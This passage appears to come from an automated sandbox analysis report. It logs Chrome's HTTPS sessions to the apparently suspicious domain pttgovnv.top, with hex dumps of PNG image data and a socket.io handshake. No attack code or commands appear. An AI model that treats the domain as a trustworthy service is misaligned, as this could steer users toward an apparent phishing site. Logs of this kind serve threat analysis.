          2024-09-01 22:25:26 UTC1369INData Raw: 3b 92 49 a7 ab af 36 57 e2 fa 71 4a 03 00 00 80 c4 ad 0f 9c b6 da 9a 1a 25 12 8d 59 6d f9 65 e3 4e 1e be b6 9d 4c 35 9d d1 95 4c 49 d7 8f 8d 4b f1 df b8 f7 e5 2f 60 b7 ad 2e 43 3f bf f9 46 42 ec c7 33 ba 76 98 da d6 09 3e 69 c7 6d 27 f2 05 8d 4b 37 49 24 ec 6c f4 1a e9 54 00 00 00 90 b8 f5 c0 f9 67 77 4d a7 df 64 59 70 c6 92 44 be c1 c4 ad db 15 82 dd d9 f7 c3 11 cf e8 d9 73 62 44 4b 0b ef c7 9e 5b 7d da 7f e5 b9 97 d9 f1 d9 2f 2b de bf 31 d2 7a c6 d0 b5 20 3b 2e fc 2d 1e 75 1b 12 25 39 ac d6 37 b6 39 12 97 b4 15 f7 63 5d d8 73 35 0d 2f 2b 7a 04 bb 01 00 50 cb 08 94 52 ec 85 55 80 49 00 17 33 2e 6e ed 7c 10 04 e1 23 be ba e0 4d 4c 08 c8 d9 b3 c6 f0 89 53 e9 b6 6d 9b ed f8 2f b5 65 a6 1b e3 8d c6 e5 f0 9b 6f c9 21 3d 43 78 47 f2 bc d9 90 18 f6 64 59 45 bb
          Data Ascii: ;I6WqJ%YmeNL5LIK/`.C?FB3v>im'K7I$lTgwMdYpDsbDK[}/+1z ;.-u%979c]s5/+zPRUI3.n|#MLSm/eo!=CxGdYE
          2024-09-01 22:25:26 UTC1369INData Raw: 3b dd 28 5c c1 66 44 b2 32 c7 44 ee f7 98 c8 45 25 89 d4 6a 1b 63 9d f3 bc ae 15 81 6b 7c f5 84 f7 eb d1 09 e1 5f 5c 79 e3 7d db 0e e5 1d 2b 47 e4 72 a2 71 6b 42 32 dc a8 57 bf 2b 4f d5 74 b1 7f ca 4d eb 82 c5 d9 5d ad d1 4b 77 bb 76 e3 10 81 02 0f 6b 67 6b b5 8c 22 24 6e 1d 70 fe d9 5d 8d a7 cf 18 d4 b6 e9 29 b2 48 3b 70 5c 10 7e ed de 81 ab 54 85 fe b8 46 bf 6e 5b 2d 4b dc 99 61 e5 7a 36 fa f0 17 fe 6c e0 33 f9 f2 56 48 e4 a6 a2 71 f4 1d 6b 48 e0 aa 35 0d 7e 00 22 57 34 5d d8 2e 50 83 ec 63 bf f1 7e 14 a1 80 c4 55 1d d1 28 dd 75 e9 92 71 99 2c a1 21 5f 26 72 3f a9 b5 ef 39 72 ec 33 f9 17 e9 9a 93 b8 db bf fc f2 33 9f d8 3b f8 72 31 f3 72 91 e3 91 53 59 22 d7 ad 81 d3 b4 9a 05 0e 22 b7 34 ba b1 5d a0 46 e1 91 5a 88 1c 24 ae ba b8 3c 6a c4 d2 19 7a cb 3a
          Data Ascii: ;(\fD2DE%jck|_\y}+GrqkB2W+OtM]Kwvkgk"$np])H;p\~TFn[-Kaz6l3VHqkH5~"W4].Pc~U(uq,!_&r?9r33;r1rSY""4]FZ$<jz:
          2024-09-01 22:25:26 UTC1369INData Raw: fd 68 d5 bd ba 25 0a 69 b0 f5 23 78 fd 6c 38 c8 86 1e f7 9e 70 a4 94 cb 47 d1 09 48 dc 4a e0 37 58 3f 13 a5 b0 fb f7 dd c9 84 fc 34 71 5b ba 8f c6 e5 f0 89 33 12 17 85 83 15 ea 99 a1 87 89 5c c6 15 39 7e 73 e6 51 b9 83 2b ad 90 b1 bd 55 51 72 f7 01 13 b9 f6 65 4a 5a db 23 0f 74 36 ce 23 5c bd 7c 7f f2 d7 17 2f 9a 9a 6d 53 d5 7d 6b 59 fb 91 57 8c 20 53 e9 b5 3d 4c e0 22 ae c0 3d c4 04 ae bf 02 c7 c5 91 9b e6 cd 3e 55 ad 93 53 64 aa c5 fa a7 d2 69 e9 a8 fb 9a bc 76 52 09 ae 54 5a 97 71 31 2c 65 14 ae 77 19 17 fb a1 12 3e ec a0 99 91 85 a9 74 d3 1e 5d 38 04 eb 52 e8 62 6c e8 2a b1 c8 41 e2 20 71 2b 92 38 5e c9 21 e4 f1 38 d1 38 c2 c6 d7 f3 b1 9e 16 23 af bf 29 87 96 7b 43 2b 05 3b 6e 3b 11 73 45 4e 75 45 2e 7b f1 1e 72 53 ac 4b c5 11 a8 a6 66 49 25 02 c9 2e
          Data Ascii: h%i#xl8pGHJ7X?4q[3\9~sQ+UQreJZ#t6#\|/mS}kYW S=L"=>USdivRTZq1,ew>t]8Rbl*A q+8^!88#){C+;n;sENuE.{rSKfI%.
          2024-09-01 22:25:26 UTC1369INData Raw: 2b 70 dc d3 f4 cd 9b 32 a1 0d cd 76 0b 3f 7f 22 13 d3 cd a9 f0 2e a9 8e 58 16 39 a2 e9 c2 8f e3 09 e1 ef 22 71 f1 e1 44 4a b8 c2 ce a7 eb f1 cb 04 25 a0 dc 4d 8d 40 e2 00 28 13 88 c4 b9 ec fe dc f3 df 5c e8 7d 9e e6 e2 b3 99 26 e1 35 36 9b 52 69 e2 53 14 b2 4f 91 a7 44 98 52 d2 c8 6e ba 9d 6c 20 5e 85 86 bc 1e f2 b3 9f 3d d2 f9 7f fe fa bd 03 df ad 80 c8 f5 33 a1 78 c8 15 35 32 4f 44 8e 90 02 51 b9 ed b7 3c 33 c4 a4 69 d6 4c bc 3f d5 d1 cb c6 9c f5 24 13 ba 59 cc f6 04 eb 0b 3f 2b bc 75 36 cd 53 89 ad 79 93 a7 a3 68 23 ff fe 81 4e 41 98 9b 82 e5 9c 3e a5 47 e2 b1 59 02 17 27 15 4c a3 1e fd 5f 37 3e 19 8b fb ba 2c 4b 38 c6 ce 05 de 3f eb 5b 24 a7 11 df 6b da d2 ef 17 45 fa a1 ec df a6 45 c8 95 28 fd f8 bd fb 06 50 f0 17 ac 3a bc a9 11 de 18 6b 19 d6 d3 99
          Data Ascii: +p2v?".X9"qDJ%M@(\}&56RiSODRnl ^=3x52ODQ<3iL?$Y?+u6Syh#NA>GY'L_7>,K8?[$kEE(P:k
          2024-09-01 22:25:26 UTC1369INData Raw: ad b5 dc b6 9b b2 51 38 9e 12 0d 15 23 72 d9 b4 ea a6 ad 33 6e d7 bc 41 4e 46 c2 a6 33 61 be ca 0d 01 bf 30 dd 53 c3 f8 b8 3d ab 9f 54 9e 46 dd b6 55 9e b5 fe b7 ce a6 23 13 13 3c 02 37 f7 fe de d2 e2 d1 db af f6 f2 ef 59 b4 80 69 09 8b 44 c6 33 23 5a d2 6c 65 f2 d6 c4 96 fa c0 07 ee 19 ec c5 59 04 d6 39 5d a4 84 ed 5c ae 56 39 3b 00 c0 e2 a0 4c 5c 6d 8a 1c 7f 8a e6 fd 74 1e 4a 26 a4 e0 f8 98 d2 34 11 f7 10 cb 14 46 97 b0 18 2e 50 bc 46 82 5e 48 e4 f2 cb c8 e5 d7 56 dd ba 75 76 73 20 85 2a 37 d4 07 84 e9 4a 0d 43 e7 8c 91 dc f7 ae da 2e cf 4a a3 0e 0d 67 22 f1 b8 3d 27 85 aa 78 04 72 dd 75 fe 70 db 55 8a 8f 09 9c 7f b1 2f 65 99 94 c4 c6 0d ed f4 89 64 78 64 28 45 52 09 93 47 2b 79 0a f6 9e 5f 81 c0 01 c0 e9 ae f2 e5 01 00 20 71 6b 5e e4 62 6c e0 17 4f a7
          Data Ascii: Q8#r3nANF3a0S=TFU#<7YiD3#ZleY9]\V9;L\mtJ&4F.PF^HVuvs *7JC.Jg"='xrupU/edxd(ERG+y_ qk^blO
          2024-09-01 22:25:26 UTC1369INData Raw: 25 fe 80 35 aa 78 ac 06 22 4c 4b 54 36 2a 27 e6 36 08 9c 6d 04 98 37 de cb 2b 37 34 04 83 24 c0 94 cf b4 08 89 27 68 83 28 90 78 73 a3 14 1a 1b b7 22 ba 4e 9b 45 36 a1 65 93 14 0e f8 85 90 e0 b6 32 c2 fb 54 9d 98 30 e3 f1 98 a5 08 7c 7d 6c 58 c2 d3 c5 d3 6c f8 d8 6f fc ce 40 4d fe c8 1b 9b 3c 09 76 7e f1 f2 84 7d f9 37 45 2e 6e 7c 9a 6d 91 4f 45 22 f6 cd e3 e3 f6 6f e1 92 05 4a 48 77 85 3f bf 16 a4 a5 77 95 57 d1 b7 0a bd 6b ac c6 77 6d 27 53 cd 89 ac 46 4d e5 7e fc 54 21 71 73 30 0d e1 f3 49 53 fe 45 5a 97 3e db d0 68 dc 77 f2 f0 b5 3c 1d c7 45 ee 60 a0 31 d4 ef de 54 83 ba 46 c3 5a 9a 86 6a e1 3b b1 ef d0 e8 fe 90 ba b2 3f aa d0 26 d2 41 a9 e0 54 6e c8 64 c4 51 c3 10 33 96 29 d4 51 3a 6f a5 80 e9 8a 10 82 20 f3 c8 5b 94 09 9d 28 08 4e 3a 33 9b f2 0c b3
          Data Ascii: %5x"LKT6*'6m7+74$'h(xs"NE6e2T0|}lXlo@M<v~}7E.n|mOE"oJHw?wWkwm'SFM~T!qs0ISEZ>hw<E`1TFZj;?&ATndQ3)Q:o [(N:3
          2024-09-01 22:25:26 UTC1369INData Raw: f7 ca 8f df c5 53 b8 7b a8 2d 6d a6 54 f0 e5 bc 35 5c 6b fb 8e 47 ee 44 d1 36 04 42 cd 4c 46 90 33 ba a5 fa bc 42 d2 b6 e9 5b 4c d6 e2 b6 45 62 a6 49 8c a4 45 5e 14 74 1e 65 13 48 36 95 2a b8 51 37 c7 e5 9c 69 53 ef 65 07 71 fa 35 9d 35 8d e4 bc 27 ba 05 ea 72 ff e6 f3 3b d3 4a d3 80 ce 0d 7c 60 cb 3f ff e2 f7 6f b8 c0 5e ff dd 4d 9f 7a a5 98 fe 68 c9 33 df b9 f1 1b a9 94 f7 93 a6 25 34 2e 74 7c d9 3e 51 ea ea ed ba e7 9f 4f f1 e6 46 86 55 ef 94 d9 d6 fb 51 a0 17 94 45 90 ba c8 d2 0a 8f 77 2d 73 fb b2 0f 46 00 2c 76 9e f4 a0 59 11 48 5c d1 f0 6e b5 14 9f f4 c7 fc 35 6f ee e2 d8 31 3d ac c8 16 d9 7a b5 31 1e 8e 7a 02 13 13 05 fb f1 9c 8e c2 ed f9 ea f1 25 9d 6c 37 7c ec 35 5e 78 dd 29 c0 7e f4 f1 8e 76 32 95 3e ed 22 8b 54 50 a8 8a 13 c6 43 89 2c 53 cd e3
          Data Ascii: S{-mT5\kGD6BLF3B[LEbIE^teH6*Q7iSeq55'r;J|`?o^Mzh3%4.t|>QOFUQEw-sF,vYH\n5o1=z1z%l7|5^x)~v2>"TPC,S


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          88192.168.2.449832172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/48.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC720INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 27613
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"6bdd-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4AoI56tL2KDCdibmWxvMpazVjMdFGsmS8lCcig6WpdFVKiUQ8mDDzWWDf8zRrbk4jDH2iAMAGTc17dY0ubMt403zit75BkS3nJqXwrfEc3SEB8Axb58GAau0V48C%2BA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e889a42a7-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC649INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 6b 6a 49 44 41 54 78 da ec fd 4d 76 1a 4b 13 70 0b e7 79 d7 db 17 a7 fd 35 84 5b b7 29 ce 08 84 47 60 3c 02 e3 11 18 8f c0 78 04 c6 23 30 1a c1 c1 23 70 69 04 46 cd af 65 d4 b8 ed 83 46 f0 5c 05 8a 14 41 2a b3 fe a8 82 02 ed bd 16 4b 36 82 fa c9 2a 94 9b c8 cc 88 bf fe f7 bf ff 39 00 00 00 00 38 2d fe 42 e2 00 00 00 00 90 38 00 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 90 38 00 00 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<kjIDATxMvKpy5[)G`<x#0#piFeF\A*K6*98-B8@@$$8
          2024-09-01 22:25:26 UTC1369INData Raw: 00 00 89 03 00 38 be 9c 0d 1f 7f fc 7a 7c dc 8b a4 e9 63 fe 28 6b 99 79 4d 4f 9f bf d0 a7 6e f5 35 f3 60 5b a3 c7 1f 93 c7 87 bc 77 f9 f8 fb 05 2d 0c 00 48 1c 00 40 75 41 13 c9 fa 60 9e ba 53 f9 9a 99 d7 88 70 5d 47 de 7e f3 f8 ba b1 be 46 c4 ec 5b e4 35 b2 bd a1 44 e7 22 a2 e7 54 0c 27 56 e6 f4 75 73 15 bd ec f1 77 4b ae 14 00 20 71 00 f0 9a 04 4d c4 4a 84 68 e0 b6 11 b4 c5 a3 14 ad 8c 2c fd 97 78 bb c8 d7 48 5e fb f8 3a 11 b5 1f 89 d7 49 c4 6d a4 ff 16 e9 ba 4a 89 9c fe 5b 84 ec 32 f2 9a 8f 3e 6a f7 b8 3f 11 ba 77 c1 3e 26 c8 1c 00 20 71 00 f0 1a 04 2e 4f d0 be 3e 0a d1 54 5f 27 e2 f4 21 f1 ba 07 f7 14 45 5b 16 88 9c 97 b4 9e 4a da 45 4c f6 1e b7 33 d4 79 73 59 e2 35 6f 65 88 36 22 71 fe 58 c6 3e 62 a7 e7 97 e9 ef e4 1c e6 cc c5 03 00 24 0e 00 4e 41 d2
          Data Ascii: 8z|c(kyMOn5`[w-H@uA`Sp]G~F[5D"T'VuswK qMJh,xH^:ImJ[2>j?w>& q.O>T_'!E[JEL3ysY5oe6"qX>b$NA
          2024-09-01 22:25:26 UTC1369INData Raw: a7 11 45 91 52 3f ef 71 93 3e 46 17 32 dc 46 de 32 f4 d7 4e 12 0a 4b aa 12 e6 cb 01 20 71 00 70 1c 64 1e 9b 4c 7c 97 e2 f3 f7 39 af bb 6d 41 60 e6 1d 12 b9 b2 e7 36 ef c8 f1 fa d5 a3 7b 23 c2 a6 f3 1e 65 d5 6a df 0c 15 67 29 89 73 4f a5 c0 64 91 87 0c 35 67 88 1c c0 e9 f1 7f 69 02 80 d3 c0 24 e3 1d e8 63 e9 1f 3a d7 cd cf 77 1b b8 dd 42 f6 2b f7 94 df 6d d9 f0 f1 4c 5d 4e 52 e0 23 49 51 19 86 6e 77 d2 ff 31 b9 92 45 18 92 bc b7 21 99 cb 22 c2 fa 25 21 71 2b f3 dc 85 8a 5c 9f 54 24 00 a7 03 73 e2 00 4e 43 e0 44 98 8a ca 62 49 a4 6d 5e 25 e9 ed 1e c7 d3 57 11 92 e3 79 1b 91 87 43 cb ad 9c f3 bb 0a 6f 2b cc 29 77 80 e3 1e bb a7 b2 5a 32 fc d9 9a 3c 25 92 02 cb 4a 65 b9 86 61 fe c0 ef 5d 4f 80 0c 00 5b 18 4e 05 e8 be c0 49 a7 fa c5 15 4f da 97 a1 b1 f1 81 0e
          Data Ascii: ER?q>F2F2NK qpdL|9mA`6{#ejg)sOd5gi$c:wB+mL]NR#IQnw1E!"%!q+\T$sNCDbIm^%WyCo+)wZ2<%Jea]O[NIO
          2024-09-01 22:25:26 UTC1369INData Raw: b8 ca f8 36 96 f9 8f 93 12 f2 3f 75 db 4a 0a 5d 41 8e fb 77 c1 6b 2e f4 b8 27 5c 72 00 24 0e e0 14 04 4e c4 46 86 1f 2f 0b 5e 3a 3e 83 ce 4d 64 24 3b 52 1b f7 dc 6e 52 64 4f 6c b8 5a 90 68 50 28 cd 4b 7d 7e 7d 04 a1 96 79 6f c3 53 8d 52 69 34 ce 96 66 4b a5 18 19 21 71 00 48 1c c0 a9 08 9c 48 4d 99 55 a8 cb 53 3f 5f 11 10 4d 45 32 6f a1 2d fb 2a 64 f2 e8 eb 63 e0 aa 57 3e b0 bc cb d9 9f fc 78 d0 eb b2 d2 87 fc 7b d9 c2 5c 45 11 b7 d1 a9 0f 33 6a 69 b6 4d 5b e5 b4 d1 25 7f 19 00 90 38 80 53 60 58 42 32 44 14 86 5d 1c 4a ad d9 91 2f 55 e4 f6 11 36 5f 6e 6c a0 3f ab 96 f9 ba 73 05 2b 26 03 64 7f b1 5a b5 17 ba ef eb 88 e0 dd aa a0 cb 75 cb f6 14 b0 d9 19 5d ff 8c 8f 3d c0 71 a0 ec 16 40 83 14 94 a9 12 d1 58 68 07 be 2e b9 bd 89 2c 22 38 d3 b6 1a a9 b0 0d 13
          Data Ascii: 6?uJ]Awk.'\r$NF/^:>Md$;RnRdOlZhP(K}~}yoSRi4fK!qHHMUS?_ME2o-*dcW>x{\E3jiM[%8S`XB2D]J/U6_nl?s+&dZu]=q@Xh.,"8
          2024-09-01 22:25:26 UTC1369INData Raw: 0b da a2 a7 51 db 22 99 93 73 7f 63 ce 4f da fd 87 5c 07 15 c5 ae 88 9c e7 41 ef df 7e d9 c5 34 3a 37 f0 bb be cf b7 5b bf ee e7 08 00 89 03 80 32 02 67 65 26 c6 5d 51 67 9e e8 b8 a7 7b c8 5c 5b 02 37 55 61 f5 51 41 19 42 93 54 10 a3 32 c3 5c 3a 44 f8 5b 85 77 5c b1 4d 32 23 31 97 81 d4 6d 16 1f c8 71 3c fe f3 ef c7 c7 7b f7 b4 12 d6 33 ae 78 aa 83 12 cf cb 39 7c 71 bb 0b 2a 46 56 76 5d 3c b5 8a 45 c4 e5 39 62 98 27 b6 e6 fc de 9a ed c8 75 f8 b3 a7 a4 36 29 72 56 de a6 35 16 79 4c f4 7d 5e 9c af f8 2b 03 80 c4 01 b4 21 70 03 57 3c 77 48 44 62 58 77 68 b1 01 99 6b ea 5c 25 fa b6 54 69 f1 c2 2a 13 cd fb 15 73 79 d9 d7 96 19 1a eb 05 52 64 e7 93 7d 89 45 a1 b4 cd 16 c1 02 83 cb 8a a7 6c 65 6a 69 f6 7f 69 64 ec 26 90 97 7e 30 df 6d 1a 88 bc b0 32 e7 33 37 32
          Data Ascii: Q"scO\A~4:7[2ge&]Qg{\[7UaQABT2\:D[w\M2#1mq<{3x9|q*FVv]<E9b'u6)rV5yL}^+!pW<wHDbXwhk\%Ti*syRd}Elejiid&~0m2372
          2024-09-01 22:25:26 UTC1369INData Raw: fe e7 6e 77 98 7c b8 6f d1 fa e0 dc e4 98 ff 6e a3 9e 6b 64 7f 61 c7 c4 70 2a 00 12 07 50 28 50 2b b7 3b 0f ee 56 3b fd 4c f3 9f b5 7d 0c 22 01 fd 16 05 6e 67 ae 95 19 0a dd 0c c3 a9 d0 e4 d5 08 8d 0e 9b 46 24 e2 79 38 50 9f 97 f7 ce eb 9c 97 9e 43 f8 b8 68 a1 f9 1f f4 5a 3f 3f f6 91 20 4d 9c ec 87 39 37 43 a9 91 f9 8e 3e b2 db 33 5f 20 3e 57 8c 4a da 7d 5a 71 6c 43 e4 56 4d 08 6f 0d 89 6b 6d 3e 1e 00 12 07 70 3e 22 37 52 e1 58 1e a2 b3 6a f9 5c 42 81 7b 11 dd 53 71 1d a8 44 4c f5 bc c7 39 db b4 12 72 e7 4c a5 8a ba 0b 14 12 b2 28 d7 61 a8 8f 22 61 bb 77 db a1 48 1b 65 8b 61 a3 75 b2 9f a2 1c 69 0f da 86 f2 58 54 89 1e 9a 05 1c 03 9d ac 6f 25 37 b6 9f 52 f3 e1 f4 9a f5 73 56 12 cb f5 fb d1 86 c8 1d f0 de 5d 05 d7 66 73 ef aa a4 f6 f4 3e 5d f0 17 0b 90 38
          Data Ascii: nw|onkdap*P(P+;V;L}"ngF$y8PChZ?? M97C>3_ >WJ}ZqlCVMokm>p>"7RXj\B{SqDL9rL(a"awHeauiXTo%7RsV]fs>]8
          2024-09-01 22:25:26 UTC1369INData Raw: b9 e2 24 3e bb 00 4d c3 ea 54 78 6d cc 73 04 6e 13 15 e9 78 c7 35 32 02 77 93 10 38 2f aa fe 9c 92 51 1e ed d8 87 fa 3a a7 6d 93 57 31 a0 a7 79 cd 3e 05 d2 87 c0 55 40 db 6b a8 ed 27 7c 92 76 4d a4 07 f1 d7 48 2a 62 c8 d0 f6 34 21 70 59 20 70 3f cd 75 cd 34 0a 18 6e 5b ee 1f bf 92 f6 83 4a dd 29 08 dc d8 a5 d3 03 01 20 71 00 67 18 fd 18 26 a2 14 5e 76 86 25 e6 27 f5 8f 78 fc 7d b7 4d 0b 21 f3 e0 52 0b 0d 32 d3 c1 c9 90 9b c8 81 ac e4 5b 14 48 c2 83 db 2e 7c 88 ed 7f 53 02 c9 48 f0 8d 3b c1 ec ff 1d 12 39 df ee 37 46 a0 57 da ce e1 6b 65 c1 4d 74 55 6b e4 ba 08 df 75 68 d1 5f 4b b9 1f 16 89 dc 70 13 bd 9f 84 d9 91 ef f1 41 c9 97 c6 5e c7 7d 08 48 1c c0 19 33 49 c8 9b 44 38 ca e6 85 cb 2a 74 34 be 63 ea 35 94 58 75 6e e4 6c 94 c8 cc 3f 37 9d f9 77 ad 39 69
          Data Ascii: $>MTxmsnx52w8/Q:mW1y>U@k'|vMH*b4!pY p?u4n[J) qg&^v%'x}M!R2[H.|SH;97FWkeMtUkuh_KpA^}H3ID8*t4c5Xunl?7w9i
          2024-09-01 22:25:26 UTC1369INData Raw: f2 5c a0 60 9e df fb 63 0f 2f 6a 67 3e 09 64 d6 b7 e9 2c ec a0 23 b5 48 37 8b 4d 22 73 08 e5 75 df ba 72 9e 35 ee bf 7f fd f9 55 59 30 63 e6 0d 0e f4 67 58 7a 2e b5 68 66 ee b6 53 11 de d4 5c 28 61 b7 51 c4 83 7e 66 e6 15 b6 3f 74 2f 23 e3 7b cd 45 05 40 e2 00 ba d1 f1 89 00 fd 48 75 fe 15 3a 40 91 a4 77 35 0e a1 f2 bc b2 a2 8e 33 58 91 28 db 97 6d 8b 84 7d a9 b3 cf 40 00 3f 1f 3b 91 af 0e 75 86 f2 26 52 36 8e b4 85 8f 20 5e 97 10 12 7f 2f 08 b5 27 d1 1f b9 6d ac 84 46 cf d3 88 8d 17 b6 a1 2b 57 67 34 76 af 15 7e a1 28 10 f1 cc a5 6b 15 e7 71 ab 32 b7 2c b1 9f 50 e2 f6 5a 8c 01 80 c4 01 74 b3 03 94 3f ec 53 df b9 95 91 9c 84 50 54 a5 f4 f0 64 c9 28 dc b2 44 c7 28 fb 9c 16 09 59 d0 01 1e 55 6c 12 91 ce 07 95 b7 45 e2 d8 17 c1 b5 c9 4b c5 91 b9 ed 70 71 ff
          Data Ascii: \`c/jg>d,#H7M"sur5UY0cgXz.hfS\(aQ~f?t/#{E@Hu:@w53X(m}@?;u&R6 ^/'mF+Wg4v~(kq2,PZt?SPTd(D(YUlEKpq
          2024-09-01 22:25:26 UTC1369INData Raw: 80 3c 98 13 07 67 8d 8a c0 54 3b 8c 5a 69 3b 0a b6 2f 1d 9d ac da ab 3d b7 cc 2c 68 a8 7c 7c 46 e6 6c 51 f8 e8 dc 3c 93 76 a1 52 c9 a6 63 08 9c be 7f 1e 48 aa 44 0f 07 25 12 bf fa d5 91 9b e8 dd a1 57 de 1e f1 5e cf 54 60 92 73 33 4d d4 6d ec e2 e5 e3 ee 54 d2 16 39 69 44 fc 75 d9 67 81 83 ff dc bc 69 52 8e 83 39 71 9b 76 30 73 f9 e4 dc 46 5d 95 71 80 3a 30 27 0e ce b9 53 1b 69 87 ee 73 84 7d d0 e1 b9 26 a3 20 d2 21 fc dc 43 e0 ac 7c cd 63 52 a2 73 de 24 fa b6 d2 c7 c0 ee 5f 85 48 3a c5 af 2e 31 7c a4 51 38 df 69 4f 0f d0 f6 29 81 bb 2d 29 70 23 f7 32 15 45 99 3a b4 13 3d 4f 3f cf 6d f8 8a 6e 79 7f 5d 2f c3 e4 c8 81 38 7d 71 2f ab 62 dc e8 17 11 91 e4 79 41 3b fb fb f4 a2 64 02 eb bc cf 4d d3 42 25 f7 9c 9f 3b 3a 36 d1 5c a7 f7 c4 d8 01 9c 11 44 e2 e0 1c
          Data Ascii: <gT;Zi;/=,h||FlQ<vRcHD%W^T`s3MmT9iDugiR9qv0sF]q:0'Sis}& !C|cRs$_H:.1|Q8iO)-)p#2E:=O?mny]/8}q/byA;dMB%;:6\D
          2024-09-01 22:25:26 UTC1369INData Raw: 7a ec d2 e9 4f cd 22 8d 91 2b b7 18 c2 73 65 a4 e2 8b b6 97 97 8d b5 6f 4f 6d 9b b5 2b 51 f3 54 5f 1b 9b cf 37 69 a8 8d 64 de 9f 5c cb a5 ee 4b b6 bb 3e 40 d2 d9 85 91 b8 51 e4 5a c5 a4 eb 5e df 27 e5 ca 16 2a c5 ff 99 6d 64 91 cf 95 5c 07 49 35 32 e8 ca c2 01 3d 8e b1 11 fb ac e2 7d 06 80 c4 01 1c 31 f2 10 46 54 ba 54 04 db 96 cd ca 12 f2 70 ad e7 74 af 11 84 a5 76 44 cf 62 a7 72 92 4a bf 31 d4 9f 3f db 3a f7 20 89 b0 a5 b0 e8 b8 46 45 17 46 5a 87 2a 09 75 23 74 5e ec ae 23 c7 69 05 65 15 a9 58 31 4e dc 33 4d 88 7f a6 c7 94 e9 70 e5 95 db 16 97 6f 5b 64 64 ce a4 0c a9 be 4b 48 9c b4 bf cc 01 fc a9 c7 f9 22 ef 9d 6e c3 e7 9d 1b 46 f6 91 99 f6 1d b8 fc 85 12 c7 62 e6 e2 b9 23 01 90 38 80 8e 08 5c 3f 21 70 ce 95 c8 33 76 60 7c 67 78 97 f8 bd 15 91 4b 7d bc
          Data Ascii: zO"+seoOm+QT_7id\K>@QZ^'*md\I52=}1FTTptvDbrJ1?: FEFZ*u#t^#ieX1N3Mpo[ddKH"nFb#8\?!p3v`|gxK}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          89192.168.2.449834104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMOa HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC617INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNjyI4x12JaK%2BP6KDRfMXdbM7vh2sOG1eKklQR4x0GoDIqHx09jQA1ngQUBcwbgceTWOXk9uPVfIgHsDkimAueropKZhc0a6hvP5TgTJIxOOvhpHfi3MXk2f7Yso0CY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e6c578c63-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 67 38 6f 38 31 6d 6d 7a 63 4f 46 67 6a 77 76 41 42 51 55 48 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"g8o81mmzcOFgjwvABQUH","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          90192.168.2.449833172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
